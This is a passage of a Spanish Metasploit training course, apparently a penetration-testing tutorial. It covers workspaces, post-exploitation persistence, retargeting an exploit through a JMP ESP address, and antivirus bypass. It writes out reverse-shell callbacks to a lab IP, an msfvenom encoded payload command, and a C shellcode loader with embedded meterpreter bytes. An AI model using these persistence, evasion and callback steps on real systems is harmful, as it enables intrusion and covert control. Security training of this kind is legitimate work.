  • 13.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 13   PostgreSQL  en  Kali  Linux.     Por  defecto  “Kali  Linux”  viene  con  un  servicio  “metasploit”  que  al  arrancarlo  crea  la   base  de  datos  para  Metasploit  y  configura  la  conexión  en  el  fichero  “database.yml”.   El   Fichero   de   configuración   de   la   base   de   datos   de   Metasploit   se   encuentra   en   “/opt/metasploit/apps/pro/ui/config/database.yml”.   Puede   localizarse   mediante   el  comando  “locate  database.yml”  desde  una  “Shell”.     En  primer  lugar  debe  arrancarse  el  servicio  de  postgresql.   root@kali#  service  postgresql  start     Una  vez  arrancado  “postgresql”  arrancamos  el  servicio  “metasploit”.   root@kali#  service  metasploit  start     Esto  creara  una  base  de  datos  llamada  “msf3”,  un  usuario  de  “PostgreSQL”  llamado   “msf3”  y  un  password  aleatorio  para  dicho  usuario.  Todos  esto  datos  los  guardará   en  el  fichero  “database.yml”  que  se  creará  en  la  ruta  nombrada  anteriormente.          
  • 14.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 14   Después  arrancamos  “msfconsole.     A  partir  de  este  momento  podemos  consultar  el  estado  de  la  base  de  datos  con  el   comando  “db_status”  desde  dentro  de  la  consola  de  Metasploit.       Nota:   Si   al   arrancar   “msfconsole”   recibimos   un   error   indicando   que   no   hay   instancia   “production”   en   “database.yml”,   hay   que   editar   el   fichero   y   copiar   el   bloque   de   configuración   correspondiente   a   la   instancia   “development”   cambiándole   el   nombre   por   “production”.   Después   se   vuelve   a   arrancar   “msfconsole”  y  listo.     Uso  de  la  Base  de  Datos  en  Metasploit.     Una   vez   configurada   la   base   de   datos,   dentro   de   Metasploit   tenemos   lo   que   llamamos   “espacios   de   trabajo”   (workspace).   Por   defecto   existe   un   “workspace”   llamado  “default”,  que  es  al  que  va  a  parar  toda  la  información  recogida  a  menos   que   configuremos   un   “workspace”   para   el   trabajo   concreto   que   estamos   realizando.     Las  buenas  prácticas  dicen  que  para  cada  PenTest,  debemos  crear  un  workspace.     Podemos  crear  un  “workspace”  con  el  comando  “workspace  -­‐a  prueba”.     Podemos  asignarnos  al  “workspace”  prueba    con  el  comando  “workspace  prueba”.     Podemos  eliminar  el  “workspace”  con  “workspace  -­‐d  prueba”.      
  • 15.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 15     Cuando   nos   asignamos   a   un   workspace,     Metasploit   va   a   registrar   en   el   toda   la   información   a   cerca   de   hosts,   credenciales,   servicios,   vulnerabilidades,   etc   que   encuentre   mediante   la   utilización   de   cualquiera   de   los   módulos   auxiliares.   Por   ejemplo  si  lanzamos  un  ataque  de  fuerza  bruta  contra  el  host  192.168.100.39  y  se   consigue   un   credencial   válida,   mediante   el   comando   “creds”   veremos   las   credenciales.         Con  el  comando  “hosts”  veremos  los  hosts  que  hemos  atacado  o  analizado.       Otros  comandos  relacionados  con  los  “workspace”.       Una   vez   realizado   el   Test   de   intrusión,   generado   el   informe   final   y   entregado   al   cliente,  el  PenTester  puede  borrar  el  “workspace”  creado  para  dicho  Test  con  un   solo  comando  y  listo  (workspace  -­‐d  prueba).        
  • 16.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 16   Exploits  más  utilizados  en  servidores.     La   gran   mayoría   de   los   exploits   para   servidores   del   arsenal   de   Metasploit   son   exploits  para  vulnerabilidades  ya  antiguas  y  ampliamente  conocidas.  Si  es  verdad   que  cuando  aparece  un  nuevo  0day,  normalmente  se  implementa  un  exploit  rápido   para  Metasploit,  la  mayoría  de  los  0day  hoy  en  día  van  orientados  a  cliente  (client   side)  y  no  a  software  de  servidor.     Aún   así,   muchos   de   los   exploits   existentes   siguen   funcionando   en   multitud   de   máquinas,  ya  que  no  todos  los  administradores  de  sistemas  mantienen  todos  sus   sistemas   actualizados,   e   incluso   muchas   máquinas   quedan   olvidadas   y   muchas   veces  conectadas  a  través  de  internet.     Algunos  de  los  exploits  más  conocidos  y  utilizados  de  Metasploit  son:     • MS08-­‐67-­‐netapi  (Win  2003,  XP).   • MS06-­‐40-­‐netapi  (Win  N.T).       • psexec  (pass  the  hash  –  Todos  los  Windows  2008  incluído).     • etc.     Exploits  “client  side”.     La  gran  mayoría  de  los  exploits  que  aparecen  cada  día  son  exploits  relacionados   con   software   de   escritorio,   los   cuales   se   utilizan   para   realizar   ataques   a   los   PC   cliente   los   cuales   pueden   utilizarse   después   para   pivotar   y   acceder   a   otras   máquinas  de  la  red  local  que  no  son  accesibles  desde  internet.     Estos  exploits  normalmente  van  dirigidos  contra  navegadores,  más  concretamente   contra  plugins  que  se  instalan  en  ellos.     Según   CVE-­‐Details,   Oracle   por   ejemplo   sufrió   unas   380   vulnerabilidades   en   los   distintos   software   que   posee,   y   ya   lleva   279   en   lo   que   llevamos   de   año   2013   (http://www.cvedetails.com/vendor/93/Oracle.html).     Si  buscamos  por  productos  por  ejemplo,  CVE-­‐Details  muestra  que  el  Flash  Player   sufrió  66  vulnerabilidades  en  2012  y  ya  lleva  44  en  2013,  43  de  las  cuales  permiten   la  ejecución  de  código  remoto  (http://www.cvedetails.com/product/6761/Adobe-­‐ Flash-­‐Player.html?vendor_id=53).     Para   utilizar   un   exploit   contra   un   software   determinado,   necesitamos   saber   exactamente  la  versión  de  dicho  software  para  encontrar  las  vulnerabilidades  que   lo  afectan  y  así  seleccionar  el  exploit  adecuado.    
  • 17.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 17   Otra   opción   que   nos   ofrece   Metasploit   es   “browser_autopwn”,   un   módulo   que   levanta  todos  los  exploits  diseñados  para  los  distintos  navegadores,  el  cual  ante   una   conexión   de   un   cliente,   averigua   su   navegador   y   plugins   mediante   “fingerprinting”  y  con  esta  información  selecciona  un  exploit  adecuado  y  lo  lanza   contra   el   cliente.   Este   módulo   en   algunas   ocasiones   falla,   ya   que   no   siempre   es   posible  acertar  el  software  utilizado  mediante  “fingerprinting”.   Post-­‐Explotación.     El  proceso  de  post-­‐explotación  es  lo  que  se  realiza  una  vez  obtenido  acceso  a  la   maquina  objetivo.     Para   la   post-­‐explotación,   vamos   a   basarnos   en   una   Shell   de   “Meterpreter”,   el   payload  por  excelencia  de  Metasploit  y  partiendo  de  que  la  maquina  objetivo  es  un   windows  (la  mayoría  de  las  técnicas  servirán  también  en  Linux,  pero  nos  basamos   en   windows   porque   la   mayoría   de   estaciones   de   trabajo   utilizan   este   sistema   operativo).     El  primer  paso  es  asegurarnos  de  que  el  usuario  víctima  no  nos  corte  la  conexión  al   cerrar   el   navegador   por   ejemplo.   Para   esto   hay   que   migrar   el   proceso   de   meterpreter  a  uno  nuevo,  que  pertenezca  a  algún  programa  en  ejecución.  Así  pues   mediante  la  orden  “ps”  buscamos  el  id  del  proceso  “explorer.exe”  por  ejemplo  y   después  ejecutamos  “migrate  PID”  lo  cual  migrará  nuestro  meterpreter  de  proceso.       El  proceso  de  migrar  el  PID  lo  incorporan  automáticamente  algunos  exploits,  pero   en  el  caso  de  no  ser  así  es  recomendable  aplicarlo  tal  cual  se  ha  mostrado.     El  siguiente  paso  será  buscar  la  persistencia,  la  manera  de  poder  conectar  con  el   cliente   fácilmente   en   próximas   ocasiones.   Para   conseguir   esto   podemos   instalar   “meterpreter”   como   servicio   en   el   PC   objetivo   para   que   este   quede   escuchando   nuevas  conexiones.     Así  pues,  primero  veremos  las  opciones  que  nos  ofrece  “mtsvc”.  
  • 18.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 18       El   servicio   lo   instalaremos   simplemente   con   el   comando   “run   metsvc”   lo   cual   dejará  un  puerto  a  la  escucha  de  conexiones.       Ahora   configuramos   un   “handler”   en   Metasploit   con   un   “payload”   especial   de   “metsvc”  y  lo  ejecutamos  para  conectar  en  el  momento  que  deseemos.       Este  método  solo  funcionará  si  el  host  víctima  no  está  detrás  de  ningún  firewall  y   podemos  acceder  a    su  puerto  31337  desde  internet.     Otro   método   sería   que   el   propio   PC   nos   lanzara   conexiones   a   nosotros,   lo   cual   permitiría  traspasar  el  firewall  sin  problemas.  Para  esto  está  “persistence.rb”,  un   script  de  “meterpreter”  que  hace  exactamente  lo  que  buscamos.  
  • 19.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 19       Ahora,   con   el   comando   “run   persistence   –X   –i   60   –p   443   –r   192.168.100.64”   haremos  que  cada  60  segundos  el  PC  víctima  intente  conectar  al  puerto  443  de  la   dirección  IP  192.168.100.64,  donde  deberemos  tener  un  “handler”  de  Metasploit.         Una  vez  instalado  el  servicio,  cada  vez  que  deseemos  conectar  con  el  host  victima   debemos  configurar  un  “handler”  de  Metasploit  con  un  “payload”  de  “meterpreter  -­‐ >  reverse_tcp”.       Ahora,  tan  solo  hay  que  esperar  60  segundos  para  que  el  servicio  de  “meterpreter”   intente  contactar  con  nuestro  Metasploit.      
  • 20.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 20   Nota:   El   servicio   “meterpreter”   instalado   no   requiere   de   autenticación,   lo   cual   indica  que  cualquiera  que  utilice  un  “handler”  de  Metasploit  utilizando  la  IP  para  la   que  hemos  configurado  el  servicio  podría  contactar  con  la  máquina  víctima,  por  lo   tanto  no  se  debe  lanzar  el  servicio  por  ejemplo  contra  una  IP  pública  dinámica  que   después   pueda   utilizar   otra   persona   (IPs   de   universidades,   cibercafés,   etc).   Lo   mismo   pasa   con   el   “metsvc”   anterior,   cualquiera   que   intente   conectar   con   el   “payload”  adecuado  al  puerto  31337  podrá  acceder.     Nota   2:   El   servicio   “metsvc”   puede   desinstalarse   ejecutando   desde   la   Shell   de   meterpreter  “run  metsvc  –r”,  pero  el  servicio  “persistence”  no,  hay  que  eliminar  la   clave   de   “auto   run”   del   registro   y   matar   el   proceso   “wscript.exe”   (HKLMSoftwareMicrosoftWindowsCurrentVersionRunxxxx….).      
  • 21.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 21   Modificación  de  exploits  en  Metasploit.     Algunos   de   los   exploits   existentes   (tanto   exploits   de   Metasploit   como   exploits   independientes)   dependen   mucho   del   sistema   operativo   objetivo   de   la   maquina   objetivo.     Así  pues  si  por  ejemplo  vamos  a  utilizar  un  exploit  para  el  software  “Ability  Server   2.34”  y  el  exploit  ha  sido  desarrollado  para  atacar  un  Windows  XP  SP3  en  Inglés,   no  nos  va  a  funcionar  en  un  Windows  XP  SP3  en  Español.     ¿Por  qué?     Por   que   cada   versión   de   Windows,   cada   idioma,   cada   Service   Pack,   carga   sus   instrucciones   internas   en   posiciones   de   memoria   distintas,   y   estos   exploits   necesitan  conocer  la  dirección  de  memoria  de  por  ejemplo  una  instrucción  “jmp   esp”  para  poder  funcionar.     Como   los   exploits   no   son   mas   que   un   trozo   de   código,   nada   impide   que   los   podamos  modificar  a  nuestro  antojo  para  adecuarlos  a  nuestro  sistema  objetivo.     En  la  imagen  siguiente  se  puede  ver  los  “targets”  del  exploit  “ability_server_stor”   de  Metasploit.       Como  se  puede  ver  este  exploit  funciona  con  Windows  XP  SP2  y  SP3  en  Inglés.  Por   lo  tanto  si  lo  queremos  utilizar  contra  un  XP  SP3  en  Español  no  funcionará.     Vamos  a  modificar  este  exploit  para  que  funcione  contra  nuestra  máquina  objetivo.   Para  ello  primero  buscamos  el  exploit  en  el  sistema  de  ficheros  (dependiendo  de  la   instalación  de  Metasploit  puede  encontrarse  en  lugares  distintos).      
  • 22.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 22     Una  vez  localizado  el  fichero,  crearemos  la  misma  estructura  de  directorios  que   hay   en   “metasploit-­‐framework”   dentro   del   directorio   “.msf4”   del   “home”   del   usuario  y  copiaremos  allí  el  fichero  de  nuestro  exploit.     Este  paso  se  realiza  porque  si  modificamos  el  exploit  en  su  directorio  original,  en   cuando  hagamos  un  “update”  de  Metasploit,  nuestros  cambios  desaparecerán  ya   que  en  el  repositorio  de  Metasploit,  está  el  exploit  original.     Editamos  el  fichero  de  exploit.  Los  exploits  de  Metasploit  están  escritos  en  “Ruby”,   aunque  no  es  necesario  ser  experto  en  este  lenguaje  para  modificar  un  exploit  ya   que  es  bastante  intuitivo.     Dentro  del  exploit  buscamos  donde  se  definen  los  “targets”.         Como   puede   verse   en   la   imagen   anterior,   a   “Ret”   se   le   asigna   una   dirección   de   memoria   la   cual   corresponde   a   la   instrucción   “JMP   ESP”   tal   como   dice   el   comentario  dentro  del  propio  exploit  (Nos  dicen  incluso  de  que  dll  lo  han  sacado).     Entonces  necesitamos  buscar  en  que  dirección  de  memoria  hay  un  “JMP  ESP”  en   nuestro  Win  XP  SP3  Español.     Abrimos  un  “debugger”  como  “OllyDB”  o  “Immunity  Debugger”  en  nuesto  windows   y  hacemos  un  “Attach”  a  alguno  de  los  procesos  en  ejecución  (para  este  ejemplo  se   ha  hecho  “attach”  de  “explorer.exe).       Después   sacamos   los   módulos   cargados   (icono   con   una   “e”   en   Immunity).   Buscamos  por  ejemplo  el  “USER32.DLL”  y  lo  abrimos  con  doble  click.     Una  vez  en  la  ventana  del  modulo  “USER32”,  pulsamos  “Ctrl  +  F”  para  buscar  y  en   el  cuadro  de  dialogo  escribimos  “JMP  ESP”  y  pulsamos  en  buscar.     El  resultado  se  ve  en  la  siguiente  imagen:  
  • 23.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 23       En   la   columna   de   la   izquierda   se   encuentran   las   direcciones   de   memoria   donde   están  las  instrucciones  que  hay  en  la  tercera  columna  (la  segunda  columna  es  el   “opcode”  que  representa  la  instrucción).     Como  vemos  la  instrucción  “JMP  ESP”  está  en  “7E3A9353”.  En  el  caso  de  que  la   dirección  de  memoria  resultante  de  la  búsqueda  contenga  algún  byte  nulo  (0x00),   hay  que  buscar  otra  vez  hasta  encontrar  una  que  no  tenga  bytes  nulos,  ya  que  si   hay  un  byte  nulo  en  el  “shellcode”  de  un  exploit,  esto  se  considera  una  terminación   de   cadena   y   dicho   shellcode   no   carga   entero   (hay   que   tener   en   cuenta   que   la   inyección  de  código  siempre  se  hace  con  funciones  de  tratamiento  de  cadenas  y   estas  cortan  la  cadena  cuando  encuentran  un  byte  nulo).     Utilizando   esta   dirección   de   memoria   ya   podemos   modificar   nuestro   exploit,   añadiendo   una   sección   para   el   Windows   XP   SP3   Español,   el   cual   quedará   de   la   siguiente  forma:  
  • 24.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 24       Después   se   recargan   los   módulos   en   Metasploit   y   nuestro   exploit   muestra   los   siguientes  “targets”.       Ahora  configuramos  el  exploit  para  probarlo  contra  nuestro  sistema  objetivo.  
  • 25.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 25       Y  lo  ejecutamos.       Como  podemos  ver  en  la  imagen  anterior,  en  la  maquina  atacante  recibimos  una   conexión  de  la  maquina  objetivo  la  cual  nos  entrega  una  Shell  de  “meterpreter”  (el   “payload”  por  excelencia  de  Metasploit).     Hemos  conseguido  acceso  al  sistema.      
  • 26.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 26   Bypass  de  antivirus  con  Metasploit     La  mayoría  de  antivirus  funcionan  por  firmas  de  software.  Contienen  una  base  de   datos   con   las   firmas   de   exploits,   virus,   malwares,   etc,   y   en   cuanto   detectan   un   elemento  que  se  corresponde  con  dicha  firma  automáticamente  lo  bloquean  y  lo   ponen  en  cuarentena.     Para   probar   esto,   hemos   instalado   en   antivirus   gratuito   “AVG   FREE”   en   nuestra   máquina  objetivo  con  el  “Ability  Server  2.34”  instalado.     Si  probamos  ha  ejecutar  nuestro  exploit  otra  vez,  sigue  funcionando  sin  problemas   ya   que   Metasploit   carga   el   “meterpreter”   inyectando   una   DLL   directamente   en   memoria  y  la  mayoría  de  antivirus  no  analizan  la  memoria  en  tiempo  real  (algunos   si  lo  hacen).         Ahora  utilizamos  la  aplicación  “msfpayload”  de  Metasploit  para  crear  un  ejecutable   de  “meterpreter”  para  windows.         Este   ejecutable   lo   intentamos   ejecutar   en   la   maquina   con   antivirus   y   pasa   lo   siguiente.  
  • 27.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 27       Nuestro  AVG  detecta  el  “payload”  como  peligroso  y  no  permite  que  se  ejecute.     Podemos   intentar   ofuscarlo   con   las   herramientas   que   proporciona   Metasploit   como   “msfencode”   o   generarlo   directamente   con   “msfvenom”   que   realiza   en   un   mismo  proceso  lo  que  se  hace  encadenando  “msfpayload”  y  “msfencode”.     Así  con  “msfvenom  –p  windows/meterpreter/reverse_tcp  LHOST=192.168.100.64   LPORT=4444   –b   ‘x00xff’   –e   x86/shikata_ga_nai   –i3   –f   exe   >   met_rev2.exe”   crearemos   el   mismo   ejecutable   pero   ofuscado   utilizando   3   rondas   de   codificado   “shikata_ga_nai”.            
  • 28.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 28   Probamos  a  copiar  nuestro  nuevo  ejecutable  en  la  maquina  windows  y  vuelve  a   saltarnos  el  antivirus.         Creación  de  un  “payload”  personalizado  que  evite  los  antivirus.     Hay   varios   métodos   para   intentar   saltarse   un   antivirus,   entre   ellos   el   uso   de   “Packers”  como  “Themida”  o  “Hyperion”,  o  la  fabricación  casera  una  plantilla  de   meterpreter  personalizada.     Primero  creamos  un  fichero  de  texto  y  lo  llamamos  por  ejemplo  “base_met.c”.  En  el   metemos  el  siguiente  código:     /*                  Plantilla  custom  para  meterpreter.   */     //  Variable  para  el  relleno   unsigned  char  padding[]=     ;     //  Variable  para  el  metrerpreter   unsigned  char  payload[]=     ;     //  Cargamos  meterpreter  en  memoria   int  main(void)  {  ((void  (*)  ())payload)  ();  }      
  • 29.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 29     Ahora  vamos  a  generar  el  relleno         y  el  payload         Todo  esto  lo  metemos  en  nuestra  plantilla  que  quedará  de  la  siguiente  forma:     /*                  Plantilla  custom  para  meterpreter.   */    
  • 30.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 30   //  Variable  para  el  relleno   unsigned   char   padding[]="mG2gFU1lEzHkR8c2M0LfhdOxUArJoO8OXhXsSS65Nt6j3tjg1a3xT5bJls X9z29Vu3lPB_wEzIrCzD2Y32709XvaOc-­‐onkNKoy8Cf6h5N4mWt-­‐ ych1da8_J3WPvavFfZZDnlPhkxv7aAU5mqNDHYqXMAD_5anTPYscXg8CL7a3qh_Tl zkzIR8JSRQEdkh3h-­‐x-­‐ OoAQaLa8RTgi4dC38f2BjEly6fKgYoPoo1WJxr4ltn8nvN_Wpxh7-­‐ k99bZivlrHt82EptTkyfHKpOLyGi1sD1Q0ffx1vX9EAPevvIeBR4xDbOkfxNSpLJDfoZ LXVmoq-­‐KLibqdtCIs5-­‐bnIA8oOoxZsSf1Pd1VPdZSInc84zwysJCI6nZH-­‐VlgTp-­‐ ZqvKcmmI2nZZhc-­‐ 24Vk6G_l7vmaPWXBCNuAvLS958oxX9Fc8ZB1kD06qnC7H76WxmU6SvdRy-­‐ NMHs2b3gjq3isEeinuLPK56vy-­‐ M0W98cNB6TAu3ArBkkjINsQbuSicEt4e1iy9mZvU34T55_es3aeBfFuuDAfXFMlKW cPuBMwb9uSAOfMk2Hhhmzaf-­‐ tx2BZAdVCAGvViXTUeMU3c9XdbKF_YbL6rlduRGI0JRmiKMfH-­‐ 9zGa3dLXJhf02zUngIicSRJvprPIk0w0JuGgaZFoOzMEgDXZY9xYbEn41kVA0-­‐ Ocv3JQxBDSJGEK34MN91X-­‐ azxGxEG6nVhTF82_R2V8NP0OwXL_UbvoR6lCLNSIf8rRwxXbjF9OUysN5Yig3UsPO Ap17t1gphe8vwedGsC6iWDoWZf89ERk16nKrKUwDKkqHt-­‐ 24FPHF90f3JwyHsAXsXoVie1bjBU1rrcHKwy58PEKvecCVRBtouyd7987YfyCBeF8V z8JxiEs3VHHLW1rMezrUtTA7DLUo3Ap8JjHWAyyvrmWEnQVLqJtdIHxe0l5keyiAQ fEQHFuAdty-­‐ 9vbbfaPIZIsu1uruzTl9CuKxxk0UvDo7GFJkPl1NXsoxroH9bRCPNSZm0S9PqSwSH1 Cf8pitT4"   ;     //  Variable  para  el  metrerpreter   unsigned  char  payload[]=   "xbdxcfx92x4cx98xdaxdaxd9x74x24xf4x5ex29xc9xb1"   "x57x83xeexfcx31x6ex0ex03xa1x9cxaex6dxe4x6fx90"   "xffxc6xdax79x26x92x3ex76x82x71xf6xc7x65x06xe3"   "xd4xb7x7bxe0x27xcbx1ex3ax77x65xbbx51x53x32xac"   "x74xf5x25x6dx1cxe5x87x67x17xa0x76x61x79x38x92"   "x8ex50x6dx62xcdx95x08x94x93x41xfbx43x54x14x7f"   "xa2x78x65xd5x8fx71xbexc9xfbx0exe0xb1x25xb9x40"   "x9ax38x18xeexcbxd6xaax61xeax0ax90x2ax57x6cxc4"   "x72x46xf4x2bx0bx4exe3x15x64xbax3cx7cx73x5ex52"   "xb7xf5xf8x42x50x79x3fx70xd5xe6x36x18x31xc3xa8"   "x2bx6cxcfx3ex91x1fx2fx14xa4xbcxf9x13xa4xaax67"   "xfdxb1xe3x03x57x21xd0x89xe2x5dx10xc8xf8xbfxd1"   "x6dxc8x64xd4x0ax92x4exd9x7ax1fxf9xcex86xfcx5c"   "x50x7fx42x57x86x39x43x08x07x06x7cx39x19x4bxc5"   "x11xffx90x55xf9x26xb1x3axfdxe4x97xf7x8ex39x92"   "xbdx9axb9x8fxd5xcdx79xbcx24xf6xddxb9x49xabx67"   "x16x2ex3ax13xb0xfex1axe5xdex7exd6xc1x31xc6xe9"   "x78x95x9ax8dxcaxb8xb0x03xd9xbex16xecx47xbcxa2"   "xb5x22x3cxf3x59xcaxb9xb8xc0xc1xa4x02x08x5fxe1"  
  • 31.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 31   "x19xb4xb7x46xa6x9cx67x19x6bxcax7ex04x79x53x6d"   "x94x2fx77x1ax9ax0bxb8x94x97x54x5bx68xfaxf6x9b"   "x29x05xe2x12xf5x36x02x42x3cx22x86xa7x03x46xda"   "x26x2ax5bx16xbdx85x4ex05x02xf6xa3x31xe7xc5xc2"   "x10x41x2fx04x32xe1x30x19x4dxa4x3ax9ax3fx30xdc"   "xfax4ax97x97xadxf6xf5x4bx47x96xe2"   ;     //  Cargamos  meterpreter  en  memoria   int  main(void)  {  ((void  (*)  ())payload)  ();  }       Ahora  hay  que  compilar  esta  plantilla  para  windows.  Tanto  en  Backtrack  como  en   Kali  Linux  necesitamos  “wine”  y  “mingw”  para  compilar  binarios  para  windows.  El   paquete   “wine”   viene   preinstalado,   pero   “mingw”   no   siempre   está.   Si   no   está   instalado,  hay  que  ejecutar  “apt-­‐get  install  mingw-­‐64”.     Una  vez  instalado  procedemos  con  la  compilación.         Ahora  probamos  a  ejecutarlo  en  la  maquina  Windows.  Para  ello  configuramos  un   “handler”   en   Metasploit   que   reciba   la   conexión   y   ejecutamos   el   binario   en   la   maquina.        
  • 32.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 32           Nuestro  Metasploit  ha  recibido  la  conexión  de  “meterpreter”  y  hemos  tomado  el   control  de  la  máquina.        
  • 33.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 33   Utilizar  Payloads  personalizados  desde  Metasploit.     En   Metasploit   es   posible   utilizar   “custom   payloads”   en   algunos   de   los   “exploits”   que   proporciona   (cualquier   “exploit”   de   Metasploit   que   suba   un   binario   a   la   maquina  víctima  y  lo  ejecute).     Esto  permite  que  ciertos  “exploits”  funcionen  aún  teniendo  la  máquina  víctima  un   antivirus  actualizado.     La  mayoría  de  “exploits”  para  Java,  navegadores,  etc  incluso  “psexec”  utilizado  para   el  ataque  “Pass  the  hash”  permiten  la  carga  de  “custom  payloads”.     Para  cargar  un  “payload”  personalizado,  en  primer  lugar  debe  crearse  el  “payload”,   por   ejemplo   mediante   la   técnica   utilizada   en   el   apartado   anterior   “Bypass   de   Antivirus”.  En  segundo  lugar  hay  que  decirle  a  Metasploit  donde  está  el  binario  que   queremos  utilizar  como  “payload”.  Lo  haremos  de  la  siguiente  forma:     msf>  set  EXE::Custom  /tmp/payload.exe     Para  saber  si  el  exploit  en  cuestión  acepta  la  opción  “EXE:Custom”  podemos  hacer   un   “show   advanced”   lo   cual   mostrará   las   opciones   avanzadas   del   “exploit”   y   comprobar  que  esta  opción  existe.     Si   configuramos   un   “payload”   personalizado,   no   es   necesario   configurar   “set   payload”,  ya  que  se  va  a  utilizar  el  binario  que  se  le  ha  proporcionado.    
  • 34.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 34   Automatización  de  tareas  en  Metasploit.     En  Metasploit  podemos  crear  scripts  que  automaticen  las  tareas  que  deseamos   llevar  a  cabo,  y  luego  llamarlos  directamente  desde  la  consola  con  el  comando   “resource  filename.rc”  o  directamente  desde  la  Shell  de  Linux  con  “msfconsole  –r   filename.rc”.     El  fichero  “filename.rc”  simplemente  será  un  fichero  de  texto  con  los  comandos  de   Metasploit  a  ejecutar.     Ejemplo  fichero  “handler.rc”.   use  exploit/multi/handler   set  payload  windows/meterpreter/reverse_tcp   set  LHOST  192.168.100.64   set  LPORT  443   set  ExitOnSession  false   exploit  –j  -­‐z     Con  la  anterior  secuencia  de  comandos  creamos  un  “handler”  de  Metasploit  en  el   puerto  443  para  el  payload  “reverse_tcp”,  así  nos  ahorramos  llamar  todos  estos   comandos  cada  vez  que  deseemos  configurar  el  “handler”.    
  • 35.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 35   Referencias.   • Metasploit  Unleashed  (http://www.offensive-­‐security.com/metasploit-­‐ unleashed/Main_Page)   • Metasploit  para  Pentesters  (Pablo  González  Pérez)  Ed:  0xword   • https://www.christophertruncer.com/     • http://www.darkoperator.com/    
  • 36.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 36                                                                             Curso  de  Metasploit  Framework.     Autor:  Ignacio  Sorribas  Mollar.   CISSP,  OSCP,  CCNA,  CCNA  Security     email:  sorribas@at4sec.com   Twitter:  @NachoSorribas   LinkedIn:  http://es.linkedin.com/in/nachosorribas/   http://www.at4sec.com